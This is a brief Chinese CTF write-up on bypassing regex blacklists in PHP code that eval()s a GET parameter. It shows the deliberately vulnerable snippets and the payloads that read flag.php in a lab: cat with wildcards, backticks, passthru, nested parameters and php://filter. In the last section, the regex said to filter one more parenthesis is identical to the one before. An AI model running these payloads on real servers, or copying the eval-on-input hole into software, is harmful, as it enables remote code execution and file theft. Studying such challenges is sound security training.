目录

被过滤了flag怎么办

方法

结果 

 过滤了flag、php、system

方法一

结果 

​编辑

方法二

过滤了很多但是主要的就是过滤了空格 和' 注意一下这个就行

方法一 

方法二

相对于上面一道题来说多过滤了一个括号 

方法一

---

被过滤了flag怎么办

<?php
error_reporting(0);
if(isset($_GET['c'])){$c = $_GET['c'];if(!preg_match("/flag/i", $c)){eval($c);}}else{highlight_file(__FILE__);
}

方法

?c=system('cat fla*');

结果 

 过滤了flag、php、system

 <?php
error_reporting(0);
if(isset($_GET['c'])){$c = $_GET['c'];if(!preg_match("/flag|system|php/i", $c)){eval($c);}
}else{highlight_file(__FILE__);
} 

方法一

?c=echo%20`cat%20fla*`;

结果 

方法二

?c=passthru('cat fla*');

过滤了很多但是主要的就是过滤了空格 和' 注意一下这个就行

<?php
error_reporting(0);
if(isset($_GET['c'])){$c = $_GET['c'];if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"|\<|\=|\/|[0-9]/i", $c)){eval($c);}
}else{highlight_file(__FILE__);
} 

方法一 

http://192.168.244.152:8080/web.php?c=passthru($_GET[A]);&A=cat%20flag.php

方法二

http://192.168.244.152:8080/web.php?c=include$_GET[A]?%3E&A=php://filter/read=convert.base64-encode/resource=flag.php

相对于上面一道题来说多过滤了一个括号 

<?php
error_reporting(0);
if(isset($_GET['c'])){$c = $_GET['c'];if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"|\<|\=|\/|[0-9]/i", $c)){eval($c);}
}else{highlight_file(__FILE__);
} 

方法一

http://192.168.244.152:8080/web.php?c=include$_GET[A]?%3E&A=php://filter/read=convert.base64-encode/resource=flag.php